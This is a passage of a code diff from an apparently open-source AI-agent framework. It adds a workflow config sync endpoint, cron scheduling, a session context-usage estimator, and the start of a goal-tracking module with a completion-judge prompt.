+    """Ensure a publish template exists in Storage, migrating config.json if present.
+
+    Returns the template that already loads for this workflow; when none does,
+    generates one, writes it to Storage, and reports ``source`` as ``"storage"``.
+
+    Raises:
+        HTTPException: 404 if the workflow is unknown; 500 on unexpected errors.
+    """
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+    try:
+        storage_key = _workflow_integration_config_key(workflow_id)
+        config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+        config, source = await _load_workflow_integration_config_template(workflow_id, data, config_path)
+        if config is None:
+            # No template could be loaded: generate one and persist it.
+            config = await _build_workflow_integration_config(workflow_id, data)
+            await Storage.write(storage_key, config)
+            log.info("workflow.config.synced", {"id": workflow_id, "storage_key": storage_key})
+            source = "storage"
+        return {
+            "ok": True,
+            "path": str(config_path),
+            "exists": True,
+            "storageKey": storage_key,
+            "source": source,
+            "config": config,
+            "runtime": await _build_workflow_integration_runtime(workflow_id, data),
+        }
+    except HTTPException:
+        # Keep status codes raised by helpers intact instead of masking them as 500.
+        raise
+    except Exception as exc:
+        log.error("workflow.config.sync.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to sync workflow config: {str(exc)}")
+
+
 @router.get("/workflow-services")
 async def list_workflow_services():
     """
@@ -1785,8 +2569,9 @@ async def list_workflow_services():
         services = []
         for key in keys:
             entry = await Storage.read(key)
-            if entry:
-                services.append(entry)
+            service = await _normalize_listed_api_service(key, entry)
+            if service:
+                services.append(service)
         services.sort(key=lambda s: s.get("publishedAt", 0), reverse=True)
         return services
     except Exception as e:
@@ -2197,10 +2982,25 @@ async def save_workflow_poller_config(workflow_id: str, req: WorkflowPollerConfi
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
+        cron_expression = (req.cronExpression or "").strip()
+        trigger_source: Dict[str, Any]
+        if cron_expression:
+            trigger_source = {
+                "mode": "cron",
+                "intervalSeconds": req.intervalSeconds,
+                "cron": cron_expression,
+            }
+        else:
+            trigger_source = {
+                "mode": "interval",
+                "intervalSeconds": req.intervalSeconds,
+            }
+
         config = {
             "workflowId": workflow_id,
             "enabled": req.enabled,
             "intervalSeconds": req.intervalSeconds,
+            "cronExpression": cron_expression or None,
             "timeoutSeconds": req.timeoutSeconds,
             "noOverlap": req.noOverlap,
             "inputs": req.inputs,
@@ -2212,10 +3012,7 @@ async def save_workflow_poller_config(workflow_id: str, req: WorkflowPollerConfi
                 "id": "schedule-default",
                 "type": "schedule",
                 "enabled": req.enabled,
-                "source": {
-                    "mode": "interval",
-                    "intervalSeconds": req.intervalSeconds,
-                },
+                "source": trigger_source,
                 "runtime": {
                     "timeoutSeconds": req.timeoutSeconds,
                     "noOverlap": req.noOverlap,
@@ -2556,11 +3353,21 @@ async def save_sample_inputs(workflow_id: str, req: SampleInputsRequest):
             workflow_json["metadata"] = {}
         workflow_json["metadata"]["sampleInputs"] = req.sampleInputs
 
-        meta = {k: v for k, v in data.items() if k not in ("workflowJson", "markdownContent", "stats", "source")}
+        meta = {
+            k: v
+            for k, v in data.items()
+            if k not in ("workflowJson", "markdownContent", "editMarkdownContent", "stats", "source")
+        }
         meta["updatedAt"] = int(time.time() * 1000)
         markdown_content = data.get("markdownContent")
         is_global = data.get("source") == "global"
-        _write_workflow_to_fs(workflow_id, workflow_json, meta, markdown_content, global_store=is_global)
+        _write_workflow_to_fs(
+            workflow_id,
+            workflow_json,
+            meta,
+            markdown_content,
+            global_store=is_global,
+        )
 
         log.info("workflow.sample_inputs.saved", {"id": workflow_id})
         return {"ok": True}
diff --git a/flocks/session/context_usage.py b/flocks/session/context_usage.py
new file mode 100644
index 000000000..35084ee92
--- /dev/null
+++ b/flocks/session/context_usage.py
@@ -0,0 +1,567 @@
+"""Session context-usage snapshot helpers.
+
+This module exposes the context usage shown by the Web UI.  Provider-reported
+usage is preferred when it reflects the current prompt, while the existing
+message/part estimator is used as the fallback for providers that do not emit
+token usage or after compaction changes the prompt shape.
+"""
+
+from __future__ import annotations
+
+import json
+from typing import Any, Dict, Iterable, List, Literal, Optional
+
+from pydantic import BaseModel, ConfigDict, Field
+
+from flocks.provider.provider import Provider
+from flocks.session.message import Message
+from flocks.session.prompt import SessionPrompt
+from flocks.session.session import SessionInfo
+from flocks.utils.log import Log
+
+
+log = Log.create(service="context-usage")
+
+UsageSource = Literal["observed", "estimated"]
+DELEGATION_TOOLS = {"delegate_task", "task"}
+ZERO_VISIBLE_SEGMENTS = {"agentDelegation"}
+
+
+class ContextUsageSegment(BaseModel):
+    """One row in the context-usage breakdown."""
+
+    model_config = ConfigDict(populate_by_name=True)
+
+    key: str
+    tokens: int = 0
+    included: bool = True
+    source: UsageSource = "estimated"
+
+
+class ContextUsageSnapshot(BaseModel):
+    """Current context usage for a session."""
+
+    model_config = ConfigDict(populate_by_name=True, by_alias=True)
+
+    session_id: str = Field(..., alias="sessionID")
+    used_tokens: int = Field(0, alias="usedTokens")
+    context_window: int = Field(0, alias="contextWindow")
+    percent: int = 0
+    source: UsageSource = "estimated"
+    last_message_id: Optional[str] = Field(None, alias="lastMessageID")
+    observed_tokens: Optional[int] = Field(None, alias="observedTokens")
+    estimated_tokens: int = Field(0, alias="estimatedTokens")
+    compacted_tokens: int = Field(0, alias="compactedTokens")
+    provider_id: Optional[str] = Field(None, alias="providerID")
+    model_id: Optional[str] = Field(None, alias="modelID")
+    segments: List[ContextUsageSegment] = Field(default_factory=list)
+    excluded_segments: List[ContextUsageSegment] = Field(default_factory=list, alias="excludedSegments")
+
+
+class _ObservedTokens(BaseModel):
+    message_id: str
+    created_ms: int
+    used_tokens: int
+    prompt_tokens: int
+
+
+def token_usage_to_dict(tokens: Any) -> Dict[str, Any]:
+    """Return a stable token dict for API/SSE payloads."""
+    if tokens is None:
+        return {"input": 0, "output": 0, "reasoning": 0, "cache": {"read": 0, "write": 0}}
+    if hasattr(tokens, "model_dump"):
+        data = tokens.model_dump()
+    elif isinstance(tokens, dict):
+        data = dict(tokens)
+    else:
+        data = dict(getattr(tokens, "__dict__", {}) or {})
+
+    cache = data.get("cache") or {}
+    if hasattr(cache, "model_dump"):
+        cache = cache.model_dump()
+    elif not isinstance(cache, dict):
+        cache = dict(getattr(cache, "__dict__", {}) or {})
+
+    return {
+        "input": _coerce_int(data.get("input")),
+        "output": _coerce_int(data.get("output")),
+        "reasoning": _coerce_int(data.get("reasoning")),
+        "cache": {
+            "read": _coerce_int(cache.get("read")),
+            "write": _coerce_int(cache.get("write")),
+        },
+    }
+
+
+async def build_context_usage_snapshot(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo] = None,
+    provider_id: Optional[str] = None,
+    model_id: Optional[str] = None,
+) -> ContextUsageSnapshot:
+    """Build a context-usage snapshot for UI display.
+
+    ``usedTokens`` means the best available estimate of the current prompt
+    footprint.  If the provider emitted usage for the latest model call and no
+    later compaction mutation has changed the prompt, we use the larger of that
+    observed value and the estimate.  Otherwise we fall back to ``SessionPrompt.estimate_full_context_tokens``.
+    """
+    active_messages = await Message.list(session_id)
+
+    breakdown_tokens, latest_compacted_part_ms = await _estimate_message_breakdown(
+        session_id,
+        active_messages,
+    )
+    message_estimate_tokens = max(
+        await _estimate_messages(session_id, active_messages),
+        sum(breakdown_tokens.values()),
+    )
+    inferred_provider_id, inferred_model_id = _resolve_message_model(active_messages)
+    provider_id = provider_id or inferred_provider_id or getattr(session, "provider", None)
+    model_id = model_id or inferred_model_id or getattr(session, "model", None)
+    context_window = _resolve_context_window(provider_id, model_id)
+    tool_definition_tokens, prompt_tool_names = await _estimate_tool_definition_tokens(
+        session_id,
+        session=session,
+        messages=active_messages,
+    )
+    system_prompt_tokens = await _estimate_system_prompt_tokens(
+        session_id,
+        session=session,
+        messages=active_messages,
+        provider_id=provider_id,
+        model_id=model_id,
+        prompt_tool_names=prompt_tool_names,
+    )
+    estimated_tokens = system_prompt_tokens + tool_definition_tokens + message_estimate_tokens
+
+    latest_observed = _latest_fresh_observation(
+        active_messages,
+        latest_context_mutation_ms=max(
+            _latest_summary_message_ms(active_messages),
+            latest_compacted_part_ms,
+        ),
+    )
+
+    observed_tokens: Optional[int] = None
+    last_message_id: Optional[str] = None
+    source: UsageSource = "estimated"
+    used_tokens = estimated_tokens
+    if latest_observed is not None:
+        observed_tokens = latest_observed.used_tokens
+        last_message_id = latest_observed.message_id
+        used_tokens = max(estimated_tokens, latest_observed.used_tokens)
+        source = "observed" if used_tokens == latest_observed.used_tokens else "estimated"
+
+    percent = (
+        max(0, min(100, int(((used_tokens / context_window) * 100) + 0.5)))
+        if context_window > 0
+        else 0
+    )
+
+    segments: List[ContextUsageSegment] = []
+    segment_tokens = {
+        "systemPrompt": system_prompt_tokens,
+        "toolDefinitions": tool_definition_tokens,
+        **breakdown_tokens,
+    }
+    unattributed_tokens = used_tokens - sum(segment_tokens.values())
+    if unattributed_tokens > 0:
+        segment_tokens["conversation"] = segment_tokens.get("conversation", 0) + unattributed_tokens
+
+    for key in (
+        "systemPrompt",
+        "toolDefinitions",
+        "conversation",
+        "reasoning",
+        "tools",
+        "skillLoad",
+        "agentDelegation",
+    ):
+        tokens = segment_tokens.get(key, 0)
+        if tokens <= 0 and key not in ZERO_VISIBLE_SEGMENTS:
+            continue
+        segments.append(
+            ContextUsageSegment(
+                key=key,
+                tokens=tokens,
+                included=True,
+                source="estimated",
+            )
+        )
+
+    return ContextUsageSnapshot(
+        sessionID=session_id,
+        usedTokens=used_tokens,
+        contextWindow=context_window,
+        percent=percent,
+        source=source,
+        lastMessageID=last_message_id,
+        observedTokens=observed_tokens,
+        estimatedTokens=estimated_tokens,
+        compactedTokens=0,
+        providerID=provider_id,
+        modelID=model_id,
+        segments=segments,
+        excludedSegments=[],
+    )
+
+
+def _coerce_int(value: Any) -> int:
+    """Convert ``value`` to a non-negative int, falling back to 0.
+
+    Falsy inputs (``None``, ``""``, ``0``) and anything ``int()`` cannot
+    convert yield 0; negative results are clamped to 0.
+    """
+    try:
+        return max(0, int(value or 0))
+    except (TypeError, ValueError, OverflowError):
+        # OverflowError covers float("inf"); float("nan") raises ValueError.
+        return 0
+
+
+def _role_value(message: Any) -> str:
+    """Return the message role, unwrapping a ``.value`` attribute when the role has one.
+
+    A missing or falsy role is reported as the empty string.
+    """
+    raw_role = getattr(message, "role", "")
+    resolved = getattr(raw_role, "value", raw_role)
+    if not resolved:
+        return ""
+    return resolved
+
+
+def _time_created_ms(message: Any) -> int:
+    """Return the ``created`` value from ``message.time`` as a non-negative int.
+
+    ``message.time`` may be a dict or an object; a missing value yields 0.
+    """
+    stamp = getattr(message, "time", None)
+    if isinstance(stamp, dict):
+        created = stamp.get("created")
+    else:
+        created = getattr(stamp, "created", 0)
+    return _coerce_int(created)
+
+
+def _is_summary_message(message: Any) -> bool:
+    """Tell whether ``message`` has a truthy ``summary`` or a ``finish`` equal to ``"summary"``."""
+    if getattr(message, "summary", None):
+        return True
+    return getattr(message, "finish", None) == "summary"
+
+
+def _latest_summary_message_ms(messages: List[Any]) -> int:
+    """Return the newest creation time among summary messages, or 0 when there are none."""
+    summary_times = [
+        _time_created_ms(entry)
+        for entry in messages
+        if _is_summary_message(entry)
+    ]
+    # Seed with 0 so an empty list (or only non-positive times) still yields 0.
+    return max([0, *summary_times])
+
+
+def _observed_tokens_for_message(message: Any) -> Optional[_ObservedTokens]:
+    """Build an observation from the token usage recorded on an assistant message.
+
+    Returns ``None`` for non-assistant messages, summary messages, and messages
+    whose recorded usage adds up to zero. Prompt tokens are ``input`` plus
+    ``cache.read``; used tokens additionally include ``output`` and ``reasoning``.
+    """
+    is_assistant = _role_value(message) == "assistant"
+    if not is_assistant or _is_summary_message(message):
+        return None
+
+    usage = token_usage_to_dict(getattr(message, "tokens", None))
+    cache_usage = usage.get("cache") or {}
+    prompt_total = _coerce_int(usage.get("input")) + _coerce_int(cache_usage.get("read"))
+    completion_total = _coerce_int(usage.get("output")) + _coerce_int(usage.get("reasoning"))
+    overall = prompt_total + completion_total
+    if overall <= 0:
+        return None
+
+    return _ObservedTokens(
+        message_id=getattr(message, "id", ""),
+        created_ms=_time_created_ms(message),
+        used_tokens=overall,
+        prompt_tokens=prompt_total,
+    )
+
+
+def _latest_fresh_observation(
+    messages: List[Any],
+    *,
+    latest_context_mutation_ms: int,
+) -> Optional[_ObservedTokens]:
+    """Return the most recent token observation unless it predates the last context mutation.
+
+    Only the newest message that yields an observation is considered. If it
+    has a non-zero creation time earlier than ``latest_context_mutation_ms``
+    the result is ``None``; older messages are not consulted.
+    """
+    observations = map(_observed_tokens_for_message, reversed(messages))
+    newest = next((item for item in observations if item is not None), None)
+    if newest is None:
+        return None
+
+    is_stale = bool(newest.created_ms) and newest.created_ms < latest_context_mutation_ms
+    return None if is_stale else newest
+
+
+async def _estimate_messages(session_id: str, messages: List[Any]) -> int:
+    """Estimate the token count of ``messages`` via ``SessionPrompt``.
+
+    Returns 0 for an empty list, and 0 (after logging a warning) when the
+    estimator raises.
+    """
+    if messages:
+        try:
+            raw_estimate = await SessionPrompt.estimate_full_context_tokens(session_id, messages)
+            return _coerce_int(raw_estimate)
+        except Exception as exc:
+            log.warn("context_usage.estimate_failed", {
+                "session_id": session_id,
+                "error": str(exc),
+            })
+    return 0
+
+
+async def _estimate_system_prompt_tokens(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo],
+    messages: List[Any],
+    provider_id: Optional[str],
+    model_id: Optional[str],
+    prompt_tool_names: Iterable[str] = (),
+) -> int:
+    """Estimate the token cost of the system prompts built for this session.
+
+    Returns 0 when the provider or model is unknown. Any failure while
+    resolving the agent or building prompts is logged at debug level and
+    also reported as 0.
+    """
+    if not (provider_id and model_id):
+        return 0
+    try:
+        from flocks.agent.registry import Agent
+        from flocks.tool.registry import ToolRegistry
+
+        agent_name = _resolve_agent_name(messages, session) or await Agent.default_agent()
+        agent = await Agent.get(agent_name)
+        if agent is None:
+            # Unknown agent name: fall back to the "rex" agent.
+            agent = await Agent.get("rex")
+
+        if agent is None:
+            effective_name, agent_prompt = agent_name, None
+        else:
+            effective_name = getattr(agent, "name", agent_name)
+            agent_prompt = getattr(agent, "prompt", None)
+        directory = None if session is None else getattr(session, "directory", None)
+
+        prompts = await SessionPrompt.build_system_prompts(
+            session_id=session_id,
+            session_directory=directory,
+            agent_name=effective_name,
+            agent_prompt=agent_prompt,
+            provider_id=provider_id,
+            model_id=model_id,
+            prompt_tool_names=prompt_tool_names,
+            tool_revision=ToolRegistry.revision(),
+        )
+        total = 0
+        for prompt in prompts:
+            total += SessionPrompt.count_tokens(prompt)
+        return total
+    except Exception as exc:
+        log.debug("context_usage.system_prompt_estimate_failed", {
+            "session_id": session_id,
+            "provider_id": provider_id,
+            "model_id": model_id,
+            "error": str(exc),
+        })
+        return 0
+
+
+async def _estimate_tool_definition_tokens(
+    session_id: str,
+    *,
+    session: Optional[SessionInfo],
+    messages: List[Any],
+) -> tuple[int, tuple[str, ...]]:
+    """Estimate the token cost of the tool definitions for this session.
+
+    Returns ``(token_count, tool_names)``, where ``tool_names`` is the sorted
+    tuple of non-empty names of the tools that were serialized. Any failure is
+    logged at debug level and reported as ``(0, ())``.
+    """
+    try:
+        from flocks.agent.registry import Agent
+        from flocks.agent.toolset import resolve_agent_initial_tools
+        from flocks.session.callable_schema import (
+            _resolve_dynamic_always_load_tool_names,
+            resolve_callable_tool_infos,
+        )
+        from flocks.session.callable_state import get_session_callable_tools
+        from flocks.tool.catalog import get_always_load_tool_names
+
+        agent_name = _resolve_agent_name(messages, session) or await Agent.default_agent()
+        agent = await Agent.get(agent_name)
+        if agent is None:
+            agent = await Agent.get("rex")
+
+        # Tools recorded for the session take precedence; otherwise start
+        # from the agent's initial toolset (or nothing if no agent resolved).
+        session_tools = await get_session_callable_tools(session_id)
+        if session_tools:
+            selected = set(session_tools)
+        elif agent is None:
+            selected = set()
+        else:
+            initial_names, _permission_rules = resolve_agent_initial_tools(
+                getattr(agent, "tools", None),
+                getattr(agent, "permission", None),
+                getattr(agent, "name", agent_name),
+            )
+            selected = set(initial_names)
+
+        selected.update(get_always_load_tool_names())
+        selected.update(await _resolve_dynamic_always_load_tool_names())
+        tool_infos, _enabled_count = resolve_callable_tool_infos(selected)
+
+        tools = [
+            {
+                "type": "function",
+                "function": {
+                    "name": info.name,
+                    "description": info.description,
+                    "parameters": info.get_schema().to_json_schema(),
+                },
+            }
+            for info in tool_infos
+        ]
+        if not tools:
+            return 0, ()
+
+        ordered_names = sorted(str(entry["function"]["name"]).strip() for entry in tools)
+        encoded = json.dumps(tools, ensure_ascii=False, sort_keys=True)
+        return SessionPrompt.count_tokens(encoded), tuple(name for name in ordered_names if name)
+    except Exception as exc:
+        log.debug("context_usage.tool_definition_estimate_failed", {
+            "session_id": session_id,
+            "error": str(exc),
+        })
+        return 0, ()
+
+
+def _resolve_agent_name(messages: List[Any], session: Optional[SessionInfo]) -> Optional[str]:
+    """Pick the agent name from the newest message that has one, else from the session.
+
+    Returns ``None`` when neither the messages nor the session name an agent.
+    """
+    recorded = (_field_value(entry, "agent") for entry in reversed(messages))
+    from_history = next((str(name) for name in recorded if name), None)
+    if from_history is not None:
+        return from_history
+
+    fallback = None if session is None else getattr(session, "agent", None)
+    return str(fallback) if fallback else None
+
+
+async def _estimate_message_breakdown(session_id: str, messages: List[Any]) -> tuple[Dict[str, int], int]:
+    """Attribute estimated tokens to context segments, message by message.
+
+    Returns ``(tokens_by_key, latest_compacted_part_ms)``. The first element
+    maps the segment keys ``conversation``, ``reasoning``, ``tools``,
+    ``skillLoad`` and ``agentDelegation`` to token counts; the second is the
+    largest compaction time found on any tool part (0 if none). Messages
+    without an id, or whose parts fail to load, contribute only their
+    ``content`` tokens.
+    """
+    totals = dict.fromkeys(
+        ("conversation", "reasoning", "tools", "skillLoad", "agentDelegation"),
+        0,
+    )
+    newest_compaction_ms = 0
+    for message in messages:
+        body = _field_value(message, "content", "")
+        totals["conversation"] += SessionPrompt.count_tokens(body or "")
+
+        message_id = _field_value(message, "id")
+        if not message_id:
+            continue
+        try:
+            parts = await Message.parts(message_id, session_id)
+        except Exception as exc:
+            log.debug("context_usage.breakdown_parts_failed", {
+                "message_id": message_id,
+                "error": str(exc),
+            })
+            continue
+
+        for part in parts:
+            kind = _field_value(part, "type", "")
+            if kind == "text":
+                totals["conversation"] += SessionPrompt.count_tokens(_field_value(part, "text", "") or "")
+            elif kind in {"reasoning", "thinking"}:
+                totals["reasoning"] += SessionPrompt.count_tokens(_field_value(part, "text", "") or "")
+            elif kind in {"agent", "subtask"}:
+                totals["agentDelegation"] += _estimate_subtask_part_tokens(part)
+            elif kind == "tool":
+                state = _field_value(part, "state")
+                if state is None:
+                    continue
+                newest_compaction_ms = max(newest_compaction_ms, _compacted_time_ms(state))
+                # The tool name decides which segment the call is billed to.
+                bucket = _context_key_for_tool(_tool_name_for_part(part))
+                totals[bucket] += _estimate_tool_state_tokens(state)
+    return totals, newest_compaction_ms
+
+
+def _field_value(value: Any, field: str, default: Any = None) -> Any:
+    """Read ``field`` from a dict (by key) or from any other object (by attribute)."""
+    if not isinstance(value, dict):
+        return getattr(value, field, default)
+    return value.get(field, default)
+
+
+def _mapping_value(value: Any, *fields: str) -> Any:
+    """Return the first truthy value found under ``fields`` in a dict.
+
+    Returns ``None`` when ``value`` is not a dict or none of the keys holds a
+    truthy value.
+    """
+    if not isinstance(value, dict):
+        return None
+    candidates = map(value.get, fields)
+    return next((found for found in candidates if found), None)
+
+
+def _tool_name_for_part(part: Any) -> str:
+    """Find the tool name for a part, or return ``""`` when none is recorded.
+
+    Lookup order: the part's own ``tool`` field, then the part's ``metadata``
+    dict, then the ``metadata`` dict on the part's ``state``. Within a
+    metadata dict the keys ``tool``, ``toolName``, ``tool_name`` and ``name``
+    are tried in that order.
+    """
+    direct = _field_value(part, "tool", "")
+    if direct:
+        return str(direct)
+
+    name_keys = ("tool", "toolName", "tool_name", "name")
+    found = _mapping_value(_field_value(part, "metadata"), *name_keys)
+    if not found:
+        state = _field_value(part, "state")
+        found = _mapping_value(_field_value(state, "metadata"), *name_keys)
+    return str(found) if found else ""
+
+
+def _context_key_for_tool(tool_name: str) -> str:
+    """Map a tool name to the context segment key its tokens are counted under."""
+    if tool_name == "skill_load":
+        segment = "skillLoad"
+    elif tool_name in DELEGATION_TOOLS:
+        segment = "agentDelegation"
+    else:
+        segment = "tools"
+    return segment
+
+
+def _estimate_subtask_part_tokens(part: Any) -> int:
+    """Sum the token counts of a part's ``prompt``, ``description``, ``name`` and ``source``.
+
+    Non-string values are stringified before counting; a falsy ``source`` is
+    skipped.
+    """
+    pieces = [_field_value(part, field, "") for field in ("prompt", "description", "name")]
+    total = sum(
+        SessionPrompt.count_tokens(piece if isinstance(piece, str) else str(piece or ""))
+        for piece in pieces
+    )
+    origin = _field_value(part, "source")
+    if origin:
+        total += SessionPrompt.count_tokens(origin if isinstance(origin, str) else str(origin))
+    return total
+
+
+def _estimate_tool_state_tokens(state: Any) -> int:
+    """Estimate the tokens a tool call state contributes to the context.
+
+    The input is always counted. When the state carries a compaction time the
+    output is not counted and a flat 10 tokens is added instead; otherwise the
+    output is counted as well. Non-string payloads are stringified first.
+    """
+    def _count(payload: Any) -> int:
+        return SessionPrompt.count_tokens(payload if isinstance(payload, str) else str(payload))
+
+    call_input = _field_value(state, "input")
+    input_tokens = _count(call_input) if call_input else 0
+
+    if _compacted_time_ms(state) > 0:
+        return input_tokens + 10
+
+    call_output = _field_value(state, "output")
+    output_tokens = _count(call_output) if call_output else 0
+    return input_tokens + output_tokens
+
+
+def _compacted_time_ms(state: Any) -> int:
+    """Return the ``compacted`` value from ``state.time`` as a non-negative int.
+
+    ``state.time`` may be a dict or an object exposing a ``compacted``
+    attribute, mirroring how ``_time_created_ms`` reads ``created``. A
+    missing ``time`` or ``compacted`` value yields 0.
+    """
+    time_info = _field_value(state, "time")
+    # _field_value handles both shapes; anything without the field gives None -> 0.
+    return _coerce_int(_field_value(time_info, "compacted"))
+
+
+def _resolve_message_model(messages: List[Any]) -> tuple[Optional[str], Optional[str]]:
+    """Find the provider/model pair recorded on the most recent message that has one.
+
+    Assistant messages are read via ``providerID``/``modelID`` attributes;
+    user messages via a ``model`` dict using either camelCase or snake_case
+    keys. Returns ``(None, None)`` when no message carries both values.
+    """
+    for message in reversed(messages):
+        role = _role_value(message)
+        if role == "assistant":
+            pair = (
+                getattr(message, "providerID", None),
+                getattr(message, "modelID", None),
+            )
+        elif role == "user":
+            model = getattr(message, "model", None)
+            if not isinstance(model, dict):
+                continue
+            pair = (
+                model.get("providerID") or model.get("provider_id"),
+                model.get("modelID") or model.get("model_id"),
+            )
+        else:
+            continue
+        if pair[0] and pair[1]:
+            return pair
+    return None, None
+
+
+def _resolve_context_window(provider_id: Optional[str], model_id: Optional[str]) -> int:
+    """Look up the model's context window size.
+
+    Returns 0 when the provider or model is unknown, and 0 (after a debug
+    log) when the lookup raises.
+    """
+    if provider_id and model_id:
+        try:
+            model_info = Provider.resolve_model_info(provider_id, model_id)
+            context_window, _max_output, _max_input = model_info
+            return _coerce_int(context_window)
+        except Exception as exc:
+            log.debug("context_usage.resolve_window_failed", {
+                "provider_id": provider_id,
+                "model_id": model_id,
+                "error": str(exc),
+            })
+    return 0
diff --git a/flocks/session/goal.py b/flocks/session/goal.py
new file mode 100644
index 000000000..29c1b5b80
--- /dev/null
+++ b/flocks/session/goal.py
@@ -0,0 +1,420 @@
+"""Persistent session goals."""
+
+from __future__ import annotations
+
+import json
+import time
+from dataclasses import dataclass
+from typing import Literal, Optional
+
+from pydantic import BaseModel, Field
+
+from flocks.provider.options import build_provider_options
+from flocks.provider.provider import ChatMessage, Provider
+from flocks.storage.storage import Storage
+from flocks.utils.log import Log
+
+
+log = Log.create(service="session.goal")
+
+# Default turn budget for a goal; also used when a non-positive budget is requested.
+DEFAULT_GOAL_MAX_TURNS = 20
+# Only the last N characters of the assistant response are shown to the judge.
+JUDGE_RESPONSE_MAX_CHARS = 4096
+# ``max_tokens`` passed to the provider for the judge call.
+JUDGE_MAX_TOKENS = 4096
+# Character cap applied to the stored clarification text.
+GOAL_CLARIFICATION_MAX_CHARS = 2000
+# Persisted lifecycle state of a goal.
+GoalStatus = Literal["active", "paused", "completed", "blocked"]
+# Outcome of evaluating one turn; "inactive" means there was no active goal to judge.
+GoalVerdict = Literal["complete", "blocked", "continue", "waiting", "inactive"]
+
+# System prompt for the judge model. The reply is parsed with ``json.loads``
+# and must be a JSON object whose ``verdict`` is one of the four values below.
+_MODEL_JUDGE_SYSTEM_PROMPT = """You are a strict goal completion judge.
+
+Return only valid JSON with exactly this shape:
+{"verdict": "complete|blocked|waiting|continue", "reason": "one sentence"}
+
+Judging rules:
+- verdict=complete only if the assistant's latest final response explicitly confirms the goal is complete or the requested deliverable is clearly produced.
+- verdict=blocked only if the latest response clearly says the goal cannot be completed and gives the specific blocker.
+- verdict=waiting if the assistant asks the user for more input, clarification, confirmation, approval, credentials, or any other user action before work can continue.
+- verdict=continue if work remains and the assistant can keep taking concrete steps without user input.
+- The reason must be concise and grounded only in the provided goal, user clarification, and latest response.
+- Keep the entire JSON response under 200 characters.
+- Do not include markdown, code fences, or any text outside the JSON object.
+"""
+
+
+class GoalClarificationAnswer(BaseModel):
+    """One clarifying question together with the answer recorded for it."""
+
+    # Question text; a "Question N" placeholder is stored when it was empty.
+    question: str
+    # Answer text; "Unanswered" is stored when no answer was given.
+    answer: str
+
+
+class GoalClarification(BaseModel):
+    """The first clarification exchange recorded for a goal."""
+
+    # Structured question/answer pairs.
+    answers: list[GoalClarificationAnswer]
+    # Flattened "Q: ... A: ..." rendering used inside prompts, capped in length.
+    text: str
+    # Seconds since the epoch at which this record was created.
+    created_at: float = Field(default_factory=time.time)
+    # Optional identifiers supplied by the caller that recorded the clarification.
+    message_id: Optional[str] = None
+    call_id: Optional[str] = None
+
+
+class GoalState(BaseModel):
+    """Persisted state of a session goal."""
+
+    # The goal text as set by the user (stripped, never empty).
+    objective: str
+    # Lifecycle state; only "active" goals are evaluated after a turn.
+    status: GoalStatus = "active"
+    # Number of evaluated turns; incremented once per evaluation of an active goal.
+    turns_used: int = 0
+    # Turn budget; reaching it on a "continue" verdict pauses the goal.
+    max_turns: int = DEFAULT_GOAL_MAX_TURNS
+    # Seconds since the epoch; ``updated_at`` is refreshed on every save.
+    created_at: float = Field(default_factory=time.time)
+    updated_at: float = Field(default_factory=time.time)
+    # Verdict and reason from the most recent evaluation.
+    last_verdict: Optional[GoalVerdict] = None
+    last_reason: Optional[str] = None
+    # Set when the goal is paused because the turn budget ran out.
+    paused_reason: Optional[str] = None
+    # First user clarification recorded for the goal, if any.
+    initial_clarification: Optional[GoalClarification] = None
+
+
+@dataclass
+class GoalDecision:
+    """Result of evaluating a goal after a turn."""
+
+    # Goal status after the evaluation; None when the session has no goal.
+    status: GoalStatus | None
+    # Verdict for this turn ("inactive" when there was no active goal).
+    verdict: GoalVerdict
+    # True only when the caller should run another autonomous turn.
+    should_continue: bool = False
+    # Prompt to feed into the next turn; set together with should_continue.
+    continuation_prompt: Optional[str] = None
+    # Explanation for the verdict.
+    reason: str = ""
+    # The goal text; None when the session has no goal.
+    objective: Optional[str] = None
+
+
+def _goal_key(session_id: str) -> str:
+    """Build the storage key under which a session's goal is persisted."""
+    return "goal:{}".format(session_id)
+
+
+def _now() -> float:
+    """Return the current time as seconds since the epoch."""
+    timestamp = time.time()
+    return timestamp
+
+
+def _trim_reason(text: str, max_chars: int = 240) -> str:
+    """Collapse whitespace in ``text`` and cap the result at ``max_chars`` characters.
+
+    Text that fits is returned as-is (after whitespace normalization).
+    Longer text is cut and suffixed with ``"..."`` so the total stays within
+    the limit. A falsy ``text`` yields ``""``.
+    """
+    normalized = " ".join((text or "").split())
+    if len(normalized) <= max_chars:
+        return normalized
+    if max_chars < 3:
+        # No room for the "..." marker. Without this guard the slice bound
+        # would go negative and the result could exceed max_chars.
+        return normalized[: max(0, max_chars)]
+    return normalized[: max_chars - 3].rstrip() + "..."
+
+
+def _judge_input(last_response: str) -> str:
+    """Return the tail of ``last_response`` that is shown to the judge.
+
+    Responses longer than ``JUDGE_RESPONSE_MAX_CHARS`` keep only their last
+    ``JUDGE_RESPONSE_MAX_CHARS`` characters; a falsy response becomes ``""``.
+    """
+    text = last_response or ""
+    too_long = len(text) > JUDGE_RESPONSE_MAX_CHARS
+    return text[-JUDGE_RESPONSE_MAX_CHARS:] if too_long else text
+
+
+def _truncate_text(text: str, max_chars: int) -> str:
+    """Collapse whitespace in ``text`` and cap the result at ``max_chars`` characters.
+
+    All runs of whitespace, including newlines, become single spaces. Text
+    that fits is returned unchanged after that normalization; longer text is
+    cut and suffixed with ``"..."`` so the total stays within the limit.
+    A falsy ``text`` yields ``""``.
+    """
+    normalized = " ".join((text or "").split())
+    if len(normalized) <= max_chars:
+        return normalized
+    if max_chars < 3:
+        # No room for the "..." marker. Without this guard the slice bound
+        # would go negative and the result could exceed max_chars.
+        return normalized[: max(0, max_chars)]
+    return normalized[: max_chars - 3].rstrip() + "..."
+
+
+def _format_goal_context(objective: str, clarification: Optional[GoalClarification]) -> str:
+    """Render the goal for the judge, appending the clarification text when there is one.
+
+    Without a clarification (or with a blank one) the bare objective is returned.
+    """
+    has_clarification = clarification is not None and bool(clarification.text.strip())
+    if not has_clarification:
+        return objective
+    return f"Original goal:\n{objective}\n\nInitial user clarification:\n{clarification.text}"
+
+
+def _format_answer(answer: object) -> str:
+    """Render an answer as text; list answers become a comma-separated string.
+
+    Blank list items are dropped, and a falsy non-list answer becomes ``""``.
+    """
+    if not isinstance(answer, list):
